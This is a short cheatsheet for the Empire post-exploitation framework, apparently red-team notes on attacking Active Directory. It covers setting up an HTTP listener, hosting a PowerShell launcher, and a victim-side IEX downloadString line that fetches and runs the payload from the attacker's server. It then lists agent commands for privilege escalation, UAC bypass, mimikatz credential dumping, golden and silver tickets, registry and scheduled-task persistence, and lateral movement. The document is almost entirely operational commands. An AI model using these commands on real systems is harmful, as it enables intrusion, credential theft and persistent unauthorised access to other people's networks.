Link to this headingEmpire

Active Directory Security: Beyond the Easy Button
Empire Repo

Empire Cheatsheet

Link to this headingSetup Empire

docker pull empireproject/empire docker run -i -t empire /bin/bash root@5e3c3ad291b1:/opt/Empire# pip install pefile root@5e3c3ad291b1:/opt/Empire# ./empire

Link to this headingCreating a launcher

Searching Modules:

(Empire) > searchmodule portscan powershell/situational_awareness/network/portscan Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

Searching Modules:

(Empire: listeners) > uselistener http (Empire: listeners/http) > set Host http://10.10.1.13:8001 (Empire: listeners/http) > set Port 8001 (Empire: listeners/http) > launcher powershell #Copy to file set up websever sudo python -m SimpleHTTPServer 80

Load module on Victim:

IEX(New-Oject New.WebClient).downloadString('http://10.10.1.13/empire.ps1')

Link to this headingInteracting with an agent

Creating a Backup agent:

(Empire: listeners/http) > back (Empire: listeners) > back (Empire) > agents (Empire: agents) > interact [agent_name] #Make a background script in case the first dies (Empire: UCVZ81NY) > spawn http

Run Custom Modules:

(Empire: UCVZ81NY) > usemodule powershell/privesc/powerup/allchecks (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/privesc/gpp (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/management/psinject <PID> (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/logonpasswords (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/privesc/bypassuac_wscript (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/golden_ticket (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/silver_ticket (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/persistence/userland/registry (Empire: powershell/privesc/powerup/allchecks) > usemodule persistence/userland/schtasks (Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/situational_awareness/network/powerview/share_finder (Empire: powershell/situational_awareness/network/powerview/share_finder) > set CheckShareAccess (Empire: powershell/situational_awareness/network/powerview/share_finder) >

Run Modules:

(Empire: UCVZ81NY) > usemodule lateral_movement/invoke_portfwd

Link to this headingCreate a a new plugin

Make a Powershell Template:

cp Empire/lib/modules/powershell_template.py .